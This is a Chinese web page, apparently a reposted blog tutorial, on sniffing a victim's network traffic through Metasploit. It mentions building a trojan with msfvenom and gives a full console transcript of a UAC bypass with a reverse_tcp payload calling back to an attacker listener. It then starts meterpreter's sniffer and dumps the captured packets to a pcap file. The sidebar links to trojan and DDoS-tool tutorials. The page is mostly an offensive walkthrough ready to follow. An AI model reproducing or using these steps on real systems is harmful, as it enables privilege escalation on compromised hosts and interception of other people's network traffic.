当前位置: 移动技术网 > 网络运营>安全>工具 > msf中内网抓取本机数据包

msf中内网抓取本机数据包

2018年02月13日  | 移动技术网网络运营  | 我要评论

1,使用msf,利用msfvenom生成木马程序,在win7 sp1测试通过.(http://www.2cto.com/Article/201304/199847.html

2,使用sniffer模块

在win7 下要多加一步,就是过UAC.这里利用 exploit/windows/local/bypassuac

另外还有一个工具可以使用,不过没测:Win7Elevate32.exe

Bypass UAC: http://www.metasploit.com/modules/exploit/windows/local/bypassuac

view source01 meterpreter > background 

02 [*] Backgrounding session 6... 

03 msf  exploit(handler) > use exploit/windows/local/bypassuac 

04 msf  exploit(bypassuac) > show options 

05   

06 Module options (exploit/windows/local/bypassuac): 

07   

08    Name     Current Setting  Required  Description 

09    ----     ---------------  --------  ----------- 

10    SESSION  4                yes       The session to run this module on. 

11   

12 Payload options (windows/meterpreter/reverse_tcp): 

13   

14    Name      Current Setting  Required  Description 

15    ----      ---------------  --------  ----------- 

16    EXITFUNC  process          yes       Exit technique: seh, thread, process, none 

17    LHOST     192.168.0.133    yes       The listen address 

18    LPORT     443              yes       The listen port 

19   

20 Exploit target: 

21   

22    Id  Name 

23    --  ---- 

24    0   Windows 

25   

26 msf  exploit(bypassuac) > set SESSION 6 

27 SESSION => 6 

28 msf  exploit(bypassuac) > exploit 

29   

30 [*] Started reverse handler on 192.168.0.133:443  

31 [*] UAC is Enabled, checking level... 

32 [+] UAC is set to Default 

33 [+] BypassUAC can bypass this setting, continuing... 

34 [*] Checking admin status... 

35 [+] Part of Administrators group! Continuing... 

36 [*] Uploading the bypass UAC executable to the filesystem... 

37 [*] Meterpreter stager executable 73802 bytes long being uploaded.. 

38 [*] Uploaded the agent to the filesystem.... 

39 [*] Sending stage (752128 bytes) to 192.168.0.103 

40 [*] Meterpreter session 7 opened (192.168.0.133:443 -> 192.168.0.103:2309) at 2013-04-02 00:34:51 +0800 

41   

42 meterpreter >  

43 meterpreter > pwd

44 C:\Windows\System32 

45   

46 meterpreter > use sniffer 

47 Loading extension sniffer...success. 

48 meterpreter > sniffer_interfaces  

49   

50 1 - 'WAN Miniport (Network Monitor)' ( type:3 mtu:1514 usable:true dhcp:false wifi:false ) 

51 2 - 'Intel(R) 82567LM Gigabit Network Connection' ( type:0 mtu:1514 usable:true dhcp:false wifi:false ) 

52 3 - 'VMware Virtual Ethernet Adapter for VMnet1' ( type:0 mtu:1514 usable:true dhcp:false wifi:false ) 

53 4 - '11b/g/n  Wireless LAN Mini-PCI Express Adapter II' ( type:0 mtu:1514 usable:true dhcp:true wifi:false ) 

54 5 - 'VMware Virtual Ethernet Adapter for VMnet8' ( type:0 mtu:1514 usable:true dhcp:false wifi:false ) 

55   

56 meterpreter > sniffer_start 4 

57 [*] Capture started on interface 4 (50000 packet buffer) 

58 meterpreter > sniffer_stats 4 

59 [*] Capture statistics for interface 4 

60     packets: 2 

61     bytes: 115 

62 meterpreter > sniffer_stats 4 

63 [*] Capture statistics for interface 4 

64     packets: 173 

65     bytes: 109330 

66 meterpreter > sniffer_dump 4 /tmp/mydump.cap 

67 [*] Flushing packet capture buffer for interface 4... 

68 [*] Flushed 225 packets (122383 bytes) 

69 [*] Downloaded 100% (122383/122383)... 

70 [*] Download completed, converting to PCAP... 

71 [*] PCAP file written to /tmp/mydump.cap 

72 meterpreter > sniffer_stop 4 

73 [*] Capture stopped on interface 4 

74 [*] There are 32 packets (6987 bytes) remaining 

75 [*] Download or release them using 'sniffer_dump' or 'sniffer_release'

76 meterpreter >

最后收集的网络数据包就可以用wireshark打开查看.找到感兴趣的内容

如对本文有疑问, 点击进行留言回复!!

相关文章:

  • 网络刺客2使用指南

    网络刺客2使用指南    “天行”推出网络刺客2已有一年,想当初此软件因其强大的功能被国内“黑”界推为惊世之作。我在得到它后,却有近半年时间在研究、寻找... [阅读全文]
  • 冰河”启示录

    冰河”启示录 作者: 陈经韬 前言:我经常在杂志和报刊上看到此类标题的文章,但大多是骗稿费的,没有任何技术含量.于是一气之下写了这编东西.本人声明如下:(一)... [阅读全文]
  • tfn2k使用方法和对策(3)

        tfn2k使用方法和对策(3) 作者:佳佳 本来想再分两次写完本文,后来发现佳佳要翻译的两篇文章 http://packetstorm... [阅读全文]
  • tfn2k使用方法和对策(2)

        tfn2k使用方法和对策(2) 作者:佳佳     佳佳继续上一次的文章,这一次是攻击测试。 测试环境:     共有5台机器,佳佳是... [阅读全文]
  • 火凤凰2.4使用教程

    今次给大家推荐的是阿风哥的作品:无赖小子。(way).说起来它普及的不广,但是面孔生疏的马儿更加隐蔽。不是众杀毒软件的众矢之的。好像不太容易被查杀。而且作者够仗... [阅读全文]
  • tfn2k使用方法和对策(1)

        tfn2k使用方法和对策(1) 作者:佳佳 今年年初,一些黑客使用DDoS向Yahoo,eBay等著名站点发起攻击,并且使y... [阅读全文]
  • 火凤凰2.0使用教程

    火凤凰是国产木马里最先使用反弹端口的木马,其避开防火墙的能力极其出色,DELPHI编写,功能较多但是不太好用,而且没有配置服务端的改变端口功能,相对而言比较危险... [阅读全文]
  • Nmap网络安全扫描器说明(5)

    Nmap网络安全扫描器说明(5) 作者:作者:Fyodor 译者:quack发布日期:2002-2-6上传日期:2002-2-6来源:不详扫描范例-------... [阅读全文]
  • Nmap网络安全扫描器说明(3)

    Nmap网络安全扫描器说明(3) 作者:作者:Fyodor 译者:quack发布日期:2002-2-6上传日期:2002-2-6来源:不详常规选项-------... [阅读全文]
  • 不需要任何密码就能达到进入中有冰河的机器!!!

    不需要任何密码就能达到进入中有冰河的机器!!!小飞刀 [[冰河第一站]]冰河出现到现在,使用得如此之广,影响如此之大。 却万万没有人想到冰河服务端竟然存在着如此... [阅读全文]
验证码:
移动技术网